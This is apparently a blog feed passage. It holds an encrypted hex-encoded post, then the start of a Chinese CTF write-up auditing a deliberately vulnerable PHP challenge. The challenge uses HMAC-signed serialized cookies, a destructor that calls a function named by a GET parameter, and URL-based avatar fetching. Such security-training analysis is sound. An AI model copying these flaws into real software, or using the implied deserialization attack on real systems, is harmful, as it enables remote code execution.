e3d2117a2c54a237478a2217094ae31b637729161726a3715dcef3470e9cfb4bc78426c957c78add99715dbd6346ce34b130f2022f6718e5350fd7f126befe691afb71afec1b20a09bb4f70fb3a042f572c42bf71821895a9275e0f9aa2bc1aef4e6ba9a98e6c545790eb4436e779be66fb0bbf229aebd6aafc7761c2f3a8740e9dea93564206e2f32008846e03f24a5d60161b4855056a2f6124f506a4b1a160a9a88ab1ab5c3cb36958894c6808d04d8718cec1641803d7f2c90a0ef8bf0feb76454ea88af88b3cbcbfc3c39c73cabc09d17540f20f0cde7b19e20ccd85b949b951668bd058b9ff523fd17178d0742ebb8ce111a6d2ff0fc0fb32c5107c3144c03a7088cb08de936af726f040922d8c684321954d99e3e4bbf8e0354fcf416d106a5cad0564dfe60a684aabdec209fe9adb69ccefe1e38eef9d9692ee7d5c456fae0eddfe2734cdcc8883890c635d35b484fd0f2201b66594d9fa39fcece2528cc491a56a075099b8c9ac1f085d8fc352cdd2002c96e0d6151876e389971bcaef2191ec49445ba93891d4badf22104ef2014929f3f5642c592e15b4824edc564b2b8ea8142d817baa8b8e080e22049206773d92c29496ff6f112a5b872ae15eea88761e6f5174ebb2f5c5c0c43478a33302f9eee81259c71be4d9fb7d3c25311598d1a86901aaa6337fa3a94f138bef93b867a04e55f88f570ecdb0f142abd2f924d93c548bf68d79899b238cd8adbb3e594ac7be2b798a29182bf61ea4f0cb42f82a8cdb1cb37ef250359410382204e924aa68b98e3d728a198318c4cdd330e9796d42d99c6b045d092916be4c4676ff736c56ef00a076a96b8e16bcd8f0ecb0de4a0f0236bb831fa04ec17e5fb69fcdcda62f028e7184865b602d71af3ca0eacf4b38b64bf9c4268ae45df7dd638dc2984d584c387e25d85ae41e29c0312569b573a47fa3a2c6f223e38f805721d4b91cba76b4f9e06b329a8ab4966aff4a50dc3d4b500986f4b71dc5f7e43ad9407e77678e712530c95e81166219d685a4c90022853553e07be006e82677e05f2dc67c4068f57af544ab4256803da5670c728e8fd071557313a2778300dd844e67acfa572e1584a975ab87e28933edabc775dc5f710e2722b590ce0c67c6c0d52c338cdd122d0b77902bca646fe509757faee4a0c7c4f13cd1d7015c3e492d8640e229537fcf1f14501fec1b5685c561a946843498d74894efc59d0da32bf1113d516ef8ca8bc93b9794e39f2107b67c3cfa2be1fded86d43a08cb14263b4bb4463cdb61a07369b001e0370d59a8edfad0b62e7d3f88c5e2a8d6205ce78f2e7d06329c17db5683c8f117dcff448fe3c134a8a28f6f3aabd17bbf31f2ab1185e750840c21cd826e10caaf3b46d67b05763a7626e40d561ac1aa0d611cb21fc055ea4388f6defaef18fb6861f92bb41114f45b5c84b9b925066bab5faa47a38c61ee77492c3a6ce6957528a853815b77b1661dd7b4249d094baaf0d20e06ec5b498e356509e0812c5112b36d004dd687939a37b3dd29d92ed2a21c936d27a49bc066323f06b70e14c1f65f077794049921bde79e7f090c13bad297ae702002f91a2889355eae5f993786f1727ca446c2813429ef23f49b1a00a71b55220092618890a086c6375b17613d3ce8b30a04decba45fd9b69dbb4f9db661c20604000b6857d58fb33a74b0509ead528754f85402a5c755dc514a34d970733d338c49f653a50a961f5841e8bc56faba0923d9814206d4255bd97ffa10176e4efedf47085008c518d409b76a711aa0d65b4196a8af86bb3d1ea99a4bf63d4ec55e1ee3754e49445c8bf1541f724785aa6c03caafa9264996fa6bfd6d472477b55cbb6348ad8c06021cf975e472f997b2ecfac0f7b4265c503055fc635791bc6af8d191952cdb22e2ab6db2720f8cd49bf65f369efccc9af1fd37cf0fd3b06ec8dd1ec6c1ccdb48c44e62788ba1d25ec7029590716277d402bf6906e5cebc0cfc781d899ed969793217360346629bf7e1cf729a271cd879064f65c79be4f3641e7cca4f0241a48ec018a7793a99fb98bc0bbb47824e9711e8b61e496510c8371ea4e95755b352a18f1e06f7bb7b1450d1f66bd25cb7b3163d5b721acbcfc90c61992adc78746f2b9f01a458904fb610d50be888b4a03350d6370ac9656d79b83f6e7b63b277ef464b320614cc5e4df1245cbd4dbdbb874bcc42d953b225ba9c20af055140cffef3d759782b7bc40c19ceeae36bafbc763fd40fcfbd2173c03f6a467f6052856fe818c2d2a8d285a43939c15eacd0cedcdfd3a38276faeb9c81e7ac3cb99ab12755dae718b2520c05ff9731c608e08ef456dd6f21941cfa932c3cde04068d9cc0c528ff94caac61b70bb2af00a28433059130bc0c6476411b28cbafef11a96d4d23b7381372ea373fc0a8e975ddf963c7471a953f48885b831b34ef24461acfc2f5e66bb11379f65f13a41700dda7bb90fcfc9933acdb1c02b3ab6735eb5a703d2f1cd62f510de5f85d99c246d0859ea510798e11588261d1a67f20280f32c4122f3dd9a999c716a2cd0d42d618a0f7dc91a88c4b1aca5ac9d9eff92269dc85e229bda31e100b05884ddfa3eaa5ade8808dc99c1bb843356c62cec3da088a224dbe1bf40861d63bfba150d3eb3dff9992b99e21713e42ddf16f3ba045f495be442e4b497702ea3b110b2186023b17527bdb5237a85410d0b381e8fbdb6eb3fb55f88e5afa8e7fd46d16170f8e484e91c000e735aa34cded690d7f4197d6d203c7a3a7c9838e49815850f94defd7db8aed612a7bc1b71822c6b814f13abb400751ce0595de731f9cf9dbfa2dc3317ed489b5eb467a93559312a8b74d31ec6b8c6bdb363277608d3ff25a8fbf8112df29017f3b12ef8df20beb7bdaf554e75c6e043127a9bef6429bb0ea8ee593c1cb10350e9d74b8d7e3de88b9c9524ffa2dfa1283444463eba4b4486254231c28e610f45d530394d9818ff6014bdfd7198189c2435be2e26eda30066ccfee137806926039b4b252126bf46c64059b3f15e53aa8a8a4f127e7e1b27981e39f34596e072db608a24160e266a95ba1a1c9743e4918915db7dbe30c551db9f7fbc9573d2924186ab561b06f422527e23f1251f82928b986c0781e00fe8aac740ea073064ed5feca57ee40ffdf83ecb139f5f985b917e0e55054af7f7a5cc021381a4d1224df62cd79664cc7a23f9dc7d3c0793bdf94009f1c2ed36a91b33ea23711b7e78e2a5fffdc32e1788253c2f07bd78aabcbae88aa22f0d65c3852f6e6abaddbc67b5fa94260a9966d62c713a3b87d5ba4d98f290c3741a14f9ce038535d2dfaaecd56f688feab97b7a6aa68fe026319fb395788fd83027b2a08bee654636f130883929ac9e86c561e11e3dc7809e2a7042280f54acd0e029e9796bb5eeaaa00ae8dfae12f32552d6ec5d21a3ac6eb84784142f2d9ebe8512c63387f0f71001098fa5838ec36146b5f920fc1500c835cb870aeccfcbf3f19152a3f117eb80f8319e91518d54879990f8153ca64a778ffa9a2a79238fd1ff7356c66c28a388c8487919131076de019cb4e40554d0b808b92807950c199281314d238e13d664e09610e19a91461a0ed061539146806ad5b5bb2122ce6555393f859faf06d34f12ae30f3c66c2ca15fd8f4e517f4bb3d8418f7f5afd7e946b53594e689c95120f04cf41c2bbc902c010e52810c74481af4685b84acff84c6d34c1a24b69e1c2fa9407f3e8763e2e5bd123f573c77b59fb60830030ec86bbc064d73a9be32a63af0a8c5e8d53ce2c7c06b76eb77017bd64932ca3f09027099c7409580cd36d95b985ce4109395e41a9cb0b7a6cab3f0bc3a2494239e95f14550ae6bd2598e208686d0e7728aff750e7590501c752a73e6aafc3563a61b6130fdc2b213dbcbf6ad46e755a32d5d80bf9f929823d2f25e524b453b8ffc1c20f7da0ba1b14ae8dab3058f11aa806377b379304c41d82161ef8909e6e89fb69d7631cdb23deabdc9e599d2dcb246f905f37ca98ec60c27a19780ab13322f01717a20c8ee0b622a29b3a14a9702031eeded0770fc27ee777bad9ef042039d9a05cb06b9b692062f8181a141f64ead458fe743d5ce56195adefbd34894db586d50de3ebb9e9c3f585694cee0807a67da2ac89c50447cb327104d2d2ed2f589c5107a09f84a0da92eb25bb3105d40c50681655d1569ed9277e71679343f05dcadb902718208c84c6df7d58cca79068b915506e21eab9bd39d7ce4af76a90fe924fcd989f70321aba78669430e26fa3cbb1b809be0003b3a1037194a5aba5ea9f443284ea756dabd9ddff44234b64c263c8782c7fcf94e2587a0350a38986cc7dec486a62cee8ce73e940de7fbec7261fd559d3542ba7ef9588d530e83869724535fb4a3f1550b77469ebdd55d4da44f74d0d033fd490786a8b0bed665d1137f2db420d2afe879968c7a4f810b18eff6e063cf3dc82f069457cb3a48b564841f125a1e3cc72a3f01e436ed3713f8218969814749e44fe5c2bc04a2f3c82735b56331cb9cfed773c59debae0e0208b5cdc12ce909930c5c71b2936ebc247b370eff1fce961c99096288d2fa878792a75bbaaf623094ab84826128a99c728729acf87a7080de960551f5322ac5197a5fa38474154c935b978da07dd38d92394c6121e4d6dd5056eb840282fe832e50aa10c149d339696cf08b9b0988567f635505ab870255147b009106c15d49b33b965e8a9cefcc2ca9da504c9889e6843b057e30f6c69b4ad78f16467ae9721e88fd6e547b6d8af8c0bd444cd59a90bcb5d7a60a0ac195c7b9d30801c18bda270821616421abda0c6c276a4ff92f9cd7df3b2fe24b786e0b96f357f6b3e9b4418be22a8add09fecc15c5dd9479da202a25e53804cde1413ee1deb59e46458c6db035ee02a547cd040118cd8ff51c406a49ac02fb79b0f97df6524eadd7b8f1850be77e1e017daaf75d853eab7d8cc078406a18c984a71e6a759b44d8b04779059e36e8d3810cb368740164439ceaecb70222a6fdb727723ae326a27fbaf45c41d0969eed9490143b9e7ce4e1baf54d025dbc2b962d2bf5b8578766c13efaec635cde771ba1160fdf20597cb564ca522a8e926045ba1c89dbaa240b32d1f07a00f385269682f0dc064486190d69979905704d0b66ff37545b6758a1b85072cbd9cddb9bac01ae67b873a2578a65a098518b06f28ede102221b60f1936d3f6ed8c238bf67e30815c26aad7af96369dc6a77ce6c35d85c0a87bb7bd1a25e2ed0ebec861688a03a14c8d30bb6b61dfc95440548f0ad69e5d409f8a3f665bacf30cb041542d067baa113a9623f628533d6dd5219e06ba5503951fcfbba8bf68649191c44f1715cac129fb5e2abcff5aa5ce1a84892933a03310ba5b788871e4da2294663158686341b384061c3dc8e2a315c5289efd7a7b24dbebe1f53c753d11377b35c29176c198769602ca6581c72b89fe6d40456ae59948b7eff6f961e36b63116eecf2e7336adf72160a4246ab2577391a376be2a3b55679485f796a4f48ed1de63ce16c622cd48725bf93b01d2e0bd5d560a09e5ec6481178dc25d6f9f03d0ea0147a744978022bdea46b0f6c717653c2e769224111f9a5b6b315d1d933b79b5c6b32fdf3bbadd93a434402664a7e32831c5e0c2e21a7861c85e9fa55b28f52e1d6cd6954356cb0c15d8837e214f4b0593b9cdd619493f7927ee80b8b5272076fe04b86f209424166864fe67793d8ceb9cfe87d0c2a369f18af2e7f03eba6e11f3330cd7a44a6efb4f9796725b97d0ac702bf02144767d22572f27abdc587c22f23d1524db8aaec57148e2541fb261838e132be4e759afa30c0d83fa50954c0a16348ab15bedc567a247fe37570f8f61978140cc2067d273028599889e1edcb20af8051633519e6a4f73b8e4df214fcd59d1e19ec30a34fa49359be76c26fbcfd2a1592c545cbaea461a6bfff3cade02ed365fc4f452e98202d4b0af8816c132df6a33223cec731443de33048fbc4f77dea2221c4adfcd72394f8816657d425c1dffe4db282411bf886ed84a23633ef240745cee76c0e4bee016af9c0c48c64a42512e521015d7e5d771d2aeae0fb4f74d8b897729f03376ca7e79166422a22a4716b8960e564f8911e3cfed4d0ccba24da48edab9a0fc0c700b04551bf8dd496b5e72f561b60a2fdabde8582fbfaade1f0053e6dae18f88b640702b81da7ecc07da7c8cbf0b06d610b23960b26552a1537fc34b0df0a9f2f45ac9083583a9fa2006295c74dd427ca359724d2095e1ce44db4637f897dec748068797053ed88983fcc7fe3c634586adc120073f3e969d55c56a951abbbcea0ed6472d6201775c5e4d9da3c807d91924336adf27292718ec93ad90edf93a6f79e1eba5fc7ea91d970f3aaa43a29f60f7f868bc2181bdeb27281b318ceef96773d4879ae772efe9a9d95374192dd9a35e54348434dfcd969e3f291d88b9de7226651c4996c306a1808ba4eb07c2d491d99ca41707a0626e553d5a2c63c2a79f53e4ed051dce3666e06edcf6b831e644514ebdf5ff2e5f05af2c79646f936c4eb7121f43422c2050bbd2a6d9421637c7e9ea9e61fa3f0268b8f632186faec193b4214d8671620874c772b1dd0bdf5d1acc313359091c16b0114fc5a7430f045ba31f5eda77a05db6f618603e3bfbe6a500bbcddbf9b6a9d2b0c3ea3c7ffe8c86e6c2fbf8c3e8111368b9c5be45607299b5661bd0daecf4f54d0cddfa53939290291e020fda698fb6ac51abd59859453873ebd5eacd2d94e30ddcb7e115d5b9988a487378f2af3402f8857b61c542f7b89d9d83899afe35a13e3920b13fe715b9a583b66a8f26841d2ae71cae12e2813c284cf8c9ae6a1bb6d83e532de73725dc15e46c6e6a9895255c1e57bd4870fb09609d4c565c3812d388c4bf3d25c437056badd650372fab0f3a9871cbc9b02af468efa1dc697ba2ab8731643d9b6ba05f8ed4233c99588375f62a0d36c7845176a45b7e5ccc0f194e7f2ae8e0180620948370fb21ffdf66352eb55cecf12c51f6a3ad6d31987836a163b418b1e179daa4fcfc47866309816db1ab2b251fccf3bbb713da2d6d8af824bbf030a21b2af091e1ced8432e0230a8b99b91928d78048262ead82262e37a5f38df0cfd9e37c76829728af428cc0f8337e3e61e0acd8e99499b071729df9ca1fc63d651ce1c0878b5781e8d6af9410f5d51b42bf091cb693319b302b6f38f129d820a2cb875bf7371fa0cb4e40434ae3b08546f20b23cf1dcb0f6b51389e65f7bb1accfa7f06a2ec0280c7e3d036f8dee166353cfbea1ae19a687c9b633f0783b112562aa9a6b70bf6da42754a77c3e889a4dc8a1887d0b8e0b7cec3ee6a730eed172c0a0e69745a190ef928c4c9c3d5d1fb8455abab265476638f256bd306ad980174693bedf7497130f9d5bcf59cacd0346e7415d732186a81423e46bab9c7ac1f077f6bde986963b57e378d05ee9d29b5e18aabe288a824e2eb129d463e618e0b66bfcf8779bf50d682064aa4ac7d94cb762fc62d740caaab767a31ffaba70ba43f4ebef6470246e98a94bd52b504f1fd035a286204bac4a48e5be7cf283735a472c5bb6b5f0ce0e7e9eeee47b567a458f467ca17b133407d487a2ab2aabd41b69ca48615503c011127276c522eb47557b25c7860a430b60379d318cb0eae9a19668e09c41df5d8aee7879dfa8fc111dcbc2c1cf78a5e2168dc8773e7d2944ef48dd55bf8efd419e1ba6a8b1dfa2385d0c2c9a4f3fac54acb68ef269973af27de95f3b77e3590365ed6c11b70c2717300f48adf0882559abefb52b3c23337e4358da3bd056fddf524ab9eabc72550276bce59db431f619d2c1fd009782e7246c18ec22b1bc81c9be493fe7b021542cebddbecc8b8f61ac03115e81639de91193fd00a0c431c6ba9493c78aad6f44133aeda599ec42130a923a3cb45e814d76f42c363be1b59bc6a045ad5c976e2cf00095b791d10bfd31cf2af7669894ed274a7a32d80cb3ab793386223e214df2264e69faf766f343eb3a4eeb1e7216be3b5c970a5b3c3dd8604ea103ae0b2d59421389dec075adbc80388797993e0fd8e196de100f742cc63a790ba3c5b55d9d190c2a5c321ce1a048424b1e8470b462190fb56b90480e63f60a954f59f9ca2d80949929083af3ab0ad30fd153b1a7e2a99d73d474b17f59b209377ac6387b48dda5e25185da8a4cfd5fa8cd732f301c4ce228f18cbf40b3f193c015358e5c0d0e59322a2d39e34d862590a64f0b5e891ce05b881c999bfa6a973e623f0061fe6ebd8603926743172058ccf95584f11e2f26c8438aeb78bc04009e86a580e787322eadde03a0671913bc3bd29000d3d55842840448ab43dd6f15b31893a8e43a2abcb5058bda3aaab124c8bac54c02bac8b2d7c3e272257fc74f7cc206dbfcef3270f3b3bf374ff40cad900882c65c2286467244f1d4252da926195cb29dc08d460f251a9da7e259c6103b692fccbb63ede44ee949881c8a7e97acca08d6ec877f4b2c4b83741add0d3f84c80fcc9a27774cf43234f59b1b3cbe9cc3ec4930a3288b70d2a58737a80765d02a29f9b9d28d21db8a15bde8a1a0f4a819ef139cbfbd3b766c2759c4c0c857abd92fae688662c735a5deb003b5c587450521c7008c83fa015376862f8c4a7c8d5377d9ababd9b7ee704f2bb39483f54ae92a40d5a3acd9802bc6942d2b1049282f2dea384491b70769edabde75a91533367b265cdbc9aac8781e40e4f4893ea43c803641c11f31fc4e6ab28725d2d1233c7ac0b9e708477ec9e56119aec4812789f74c66dcdced84b26e8973a6095fff08d26a6b8810d5093b7194a8e7025171ad68cd312db97a6195765a634fdfde724f416a18a44d6b4f32f12f904dd0f605fb7e73fbd80b464e32a8da7e909b23d97fc19c877d36049b28bfea9bc588fcbe3a589299e2323fa609b62fb8b8342b7d330face2240f07b9f6042a2d594e34faf11f2f6b10d2a4d3813c4df689775cecfd012e7e7283cda3ab056eb5109089426971cfebde3b14ad7caf8a3bc3df8cc07461cef5060b4fc7ecab9b82b94482c56b6d92df05d31590c3b95515109705ee80919578ddd17d80387814032cb66ecafbe5acc5799afc0fd4248b5cf5df7dca95055772a41cbca83ec9a04abb3e7b13400e209fad9cf56282be9e214c2bdd2f4d20c697463abcad37893458545fc6ef23a4ffcb5591f237012d887a897a334663e15c057d06216038e3a239cd3e4271d9f100823db44a270e870fab4be003be85309bede57d2ed2756c893c9da8f1457cdacd3f403deba2567ddce444c2c55d74af6efc56c2cd52d56d6b036d9c67720abe73fe992366224de04f070208fd76dbad587aa4aaa96f89de39f65249ee121526aaa5762264349fc95c4f63d1a98d0152ada4218fac194372d15ee7540b331a080e7eaecd96bb5c20363e08946b2bcda4882f242d59cdbe6a946bfda2a3a3a01974390b6db76150387140715dcc475d777e4c62f916bc55c319beef8145a27997e7413535b6c3fec14dfa2e42c1aa08a6ccfbb34977f8d90524e5e149021e6393a5e2e59a3a10afb8bdc8b032daadaf89ab7899531fccb0036dd77f18c2bb063e373a13d3049cdc196c69eac8ec1633626a59788b2b9b81f2f333fc3eb1a3d18d242e1a58094c07ca3afc2dde83cb35a5d866d3447eebb6c060a2f71866c851a0b7d41c416898b57850ce9b45a2bf7ab5acd32c464297faf740ca6189767c661c61c89fff954a3a25997cea909007b75fdcc15e45f62e20bd36f40691aac71b5e2664589b8ba89162ad2c01582f003218c14cd9a666862f6849dfe9dadb2fc3f8b90e6148fa57413b436f827bbe690b87d069b1731fc9535cd73ec6eeb11ae2a1bb2317dc9a2ca3d2f583a5fe43e0ad33b11a6119741113a83147c2bae7ee713118bde377f2f57164c0c44d2b30a06d2e7c7d2772dae0cca2e5c17b05513d293fe0d816377aaadfa99b82f1f9fa8d08e8f4a1a366d96f78b1d2b73ea12c44df13a189bc02cbc967c166b5c57bcb57cf1428f01d4660ca3aaf38dd6f28ee089666bd75dfbc089556c26d77dfbdfa4e65b2b59a552f50e6e01512e656fbef76badec5f0525bb4222d17504153fe2670e8f8ca0f8a264e16a76acc6cafcfd21551b059e214178277b2c6175e98097408df1d9bb8f5858a546e3bbcb8892bf23a51d12a9fde119bded058b50a0071c96ff499babfeec9a53a7fab3622e24d4c331d23cf6c0e34f77ad8ea57f7c2e613eeba7a01361d90f292dde26c5dca04f65d585339900e609094407f71f6aaa310eea9ab2a143581a965178e49356425d7940f650950635e06a92371407fba81e3b0fe53f1516f6c38ebda1271c10511e3f344f638d64b929120b6c68db9d683e35462c344d6f87b7a21d4c40bd22c4be758b79362098ff7d4447f316adb4d5706e1f7eadf1914e3dd5ca0836956c096eca7c5328b1e7e7a8b6d93271095b275de8c80aadca892dfa265c2aadb9ee86052e8e2fba7b4b32cf079346b86c43dfb6fc24294b929bd800f25d6547f4ac1cdc14a394637d1c50754e3c46b11adce5e40c8aa8f1737c8e25c5b4ab6504e5f7137c727e527e621738bfe2f3cf6783ce4ddd604fe2c9cb65e7d61e57e47cac20bb06cb45a7b0b4ab9bdad8a246bdb88516cfd0dae0fa009d0de22e46c58498eb31b5658201610f0ac178d9f4a58978b294b4086712e04dd0df534b4b16832ca5869b1fa57dc3e70f12349d2e303a0ce618071b3d8b10392f6a81b909468b433b14890c2fedc192a7a5099a4b159c8704b84fe4f856b29fbfa37a7a86c95a0ef56a3e0c82baf87f2af5e776db85998ca06434c1c582e8d454dbe4a12de63d4719475030b78d239fcdc9607a0814fe85fcac7b9aeafaa740d93763211ae84bbe040359fcb59581f45c583cea87690f6b06671ef5dabc5cd5bab3f16730107af3cc692b8b606dc22035090e4a436bb2303460c54425f1e9c865f2e4233e22b5e25885dea7ba6b0e1906da0b0cbae2173b672def601ace73ec0a58fd83c0482b44cd7851319e0695e268d0ca48269e21a6e07851b250d518328daa51239297a2bc01daeaede541cbf73f6b5a79aa737cccf6446025eec6532aee9753acb3ecde2e8706c424feba90aca25251f2b95fa961402c1867ee046053e2d8d78f9be5382148141b2e34592a01257dbdc7dc2e0ec77c5e8c829f5bcbe8cacf1cfb69fde32644ae63a77fc264097575c855e1dab187a0aa30b62289343a1803953c8bea62dc399da559d11cab262bc31219d9520a20d715aed1888ba7700afc8bd173cc08b7eff50273debc0afcc21314c22fc0e8dbbeddb8ce7266dc6f2baa86c5d98bc7b6ed8a9afa6a981bea87540e7c52d48ed724a528de00e31075dec83332d004ff3188324bc6770fa424447e122943ee2baf33e84c6bda34f82b3481d1b8fe830eebcdef495e520d93455984cb4d34f203f4a7facd5f772e574dde154ad36d1f810ce94c62732eb2965bae08b514861536ef62afdaf106e57bb2a6f91c7474438cfd93a2ea1f654d189bf48a5c591bc40615a0f4777e256d7fa7af1426dc095ea2ce1415adefb3a5531c46e80c97d9d957e223e2f3d34b7103c0ad806d4e5046ac16daa3b2316802f134254381b9dfbde9ba45db47c1be2bfe72448561db8efec13a4ad50bf41184e8c7741a378b832c364ad6281cf80c2eb690d5edfb58a721dfead67267a4d2bd5c23b61482978b93d35609092816ab9398ad4b604d379670c74be70bc03eba07282cc3dde6d45dd0bf09544942ca59b90631751fd7d8abf60cbe95653a5a47bbcd085caa03e336a28c9108f3190e55af1357351d5aeb1a75d3f634ea5cde26c0a7b894c08b4b60fe92558d8ad9033523a1473bc5926ed82b2efba098fbf8bb86af99b8e544547ddde012a0e4d0d8607b13359d7dae4c1b60ec38f3945fb8573a2189111df27c0b7a01dc33d6d9453637ea92edf5a39414bb73127a16a93a861adecfc3d0bb5e099625bf5b9679919017d61e09939718207c7f9bdcb1b3ac3937a6fb0da3e73f554c03b47c3a84ced88455a30adffc980d1ba7dcd3ce5312351ca3906d208ba943b318c851857105860abc356896d9d39d452cc27b1b9700c22b4b4e9091cdb30f8ea38ee393de4fb72f76b15fa12fa1f528d8f7b36c3bd2344ab496c13c331e819c6a8891742e59ee828c531139fedd237366de0fe6e1759d56d9d5a4cee2d4144dfe2d1d2987794d899c590c98d29b45ca0adceae9b19a377b95a74c14c9cb4adb659b859b413fddccc1739d8e2b1fbec66c2eec6eca23df07bbb4e2d96db1e63059a80dd5f7c8d291a61bae23bed46b003d92ce2b3e3f9b630c2d8a053a813c1992558c283c0c0e5c1d7fa5f908870822902010df99d</script>
</div>
<script src="/lib/blog-encrypt.js"></script><link href="/css/blog-encrypt.css" rel="stylesheet" type="text/css">]]></content>
<tags>
<tag>JAVA</tag>
</tags>
</entry>
<entry>
<title>记一次CTF拉练</title>
<url>/2020/06/12/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/</url>
<content><![CDATA[<h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h4><p>这篇文章讲述了一次CTF拉练的一道php的白盒审计题,该文章也是接着Phar://这篇文章写的,主要是记录一下。</p>
<a id="more"></a>
<h4 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h4><p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/index.php.png" alt=""></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span> (!file_exists(<span class="string">"/var/www/data/secret"</span>)) { <span class="comment">//判断是否存在secret文件,不存在将写入secret文件,存在读取文件</span></span><br><span class="line"> $SECRET = randomkeys(<span class="number">16</span>); <span class="comment">//生成16随机字符</span></span><br><span class="line"> file_put_contents(<span class="string">"/var/www/data/secret"</span>, $SECRET); <span class="comment">//将生成的16随机字符串写入secret文件</span></span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> $SECRET = file_get_contents(<span class="string">"/var/www/data/secret"</span>); <span class="comment">//将整个文件读入一个字符串</span></span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_SERVER[<span class="string">"HTTP_X_REAL_IP"</span>])) <span class="comment">//判断$_SERVER["HTTP_X_REAL_IP"]是否设置并且非空</span></span><br><span class="line"> $SERVER_IP = $_SERVER[<span class="string">"HTTP_X_REAL_IP"</span>]; <span class="comment">//true就赋值给$SERVER_IP</span></span><br><span class="line"><span class="keyword">else</span> $SERVER_IP = $_SERVER[<span class="string">"REMOTE_ADDR"</span>]; <span class="comment">//false就获取用户的 IP 地址赋值给$SERVER_IP</span></span><br><span class="line">$SANDBOX = <span class="string">"/var/www/data/"</span> . base64_encode(<span class="string">"ctf"</span> . $SERVER_IP); <span class="comment">//路径为/var/www/data/加base64编码(ctf+$SERVER_IP) .代表拼接</span></span><br><span class="line">@mkdir($SANDBOX); <span class="comment">//创建$SANDBOX文件夹 单独的沙盒文件夹</span></span><br><span class="line">@chdir($SANDBOX); <span class="comment">//改变目录$SANDBOX</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>($_COOKIE[<span class="string">"session-data"</span>])) { <span class="comment">//检查变量是否已设置且不为NULL,不存在将</span></span><br><span class="line"> $data = serialize(<span class="keyword">new</span> User($SANDBOX)); <span class="comment">//序列化</span></span><br><span class="line"> $hmac = hash_hmac(<span class="string">"sha1"</span>, $data, $SECRET); <span class="comment">//生成哈希值,sha1算法,$data加密数据,$SECRET为所使用的密钥,</span></span><br><span class="line"> setcookie(<span class="string">"session-data"</span>, sprintf(<span class="string">"%s-----%s"</span>, $data, $hmac)); <span class="comment">//向客户端发送一个HTTPcookie,唯一的标识对象加上签名作为session-data</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span> </span>{</span><br><span class="line"> <span class="keyword">public</span> $avatar;</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($path)</span> </span>{ <span class="comment">//允许在实例化一个类之前先执行构造方法。</span></span><br><span class="line"> <span class="keyword">$this</span>->avatar = $path; <span class="comment">//标识路径为头像的路径</span></span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Admin</span> <span class="keyword">extends</span> <span class="title">User</span> </span>{ </span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span> </span>{ <span class="comment">//析构函数</span></span><br><span class="line"> $_GET[<span class="string">"lucky"</span>](); <span class="comment">//php 通过GET变量来调用函数</span></span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">randomkeys</span><span class="params">($length)</span></span>{ <span class="comment">//定义生成随机数方法</span></span><br><span class="line"> $output=<span class="string">''</span>; </span><br><span class="line"> <span class="keyword">for</span> ($a = <span class="number">0</span>; $a<$length; $a++) { </span><br><span class="line"> $output .= chr(mt_rand(<span class="number">0</span>, <span class="number">0xFF</span>)); <span class="comment">//生成php随机数 </span></span><br><span class="line"> } </span><br><span class="line"> <span class="keyword">return</span> $output; </span><br><span class="line"> } </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getFlag</span><span class="params">()</span> </span>{ <span class="comment">//定义读取flag方法</span></span><br><span class="line"> $flag = file_get_contents(<span class="string">"/flag"</span>); <span class="comment">//把文件字符串读取赋值给$flag</span></span><br><span class="line"> <span class="keyword">echo</span> $flag; <span class="comment">//输出flag</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check_session</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">global</span> $SECRET;</span><br><span class="line"> $data = $_COOKIE[<span class="string">"session-data"</span>];</span><br><span class="line"> <span class="keyword">list</span>($data, $hmac) = explode(<span class="string">"-----"</span>, $data, <span class="number">2</span>); <span class="comment">// 从cookie中取出data和hmac签名存到数组(字符串打散为数组)</span></span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">isset</span>($data, $hmac) || !is_string($data) || !is_string($hmac)) { <span class="comment">#判断是否为空</span></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"Bye"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!hash_equals(hash_hmac(<span class="string">"sha1"</span>, $data, $SECRET), $hmac)) { <span class="comment">// 判断data加密之后和hmac签名是否对应</span></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"Bye Bye"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> $data = unserialize($data); <span class="comment">// 反序列化</span></span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">isset</span>($data->avatar)) { <span class="comment">//如果反序列化之后的data包含的类中无avatar成员,输出一条消息,并退出当前脚本</span></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"Bye Bye Bye"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> $data->avatar; <span class="comment">//返回上传路径 </span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">upload</span><span class="params">($path)</span> </span>{</span><br><span class="line"> <span class="comment">// 检查文件头是否为GIF89a,不等于GIF89a 返回fuck off</span></span><br><span class="line"> $data = file_get_contents($_GET[<span class="string">"url"</span>] . <span class="string">"/avatar.gif"</span>);</span><br><span class="line"> <span class="keyword">if</span> (substr($data, <span class="number">0</span>, <span class="number">6</span>) !== <span class="string">"GIF89a"</span>) {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"Fuck 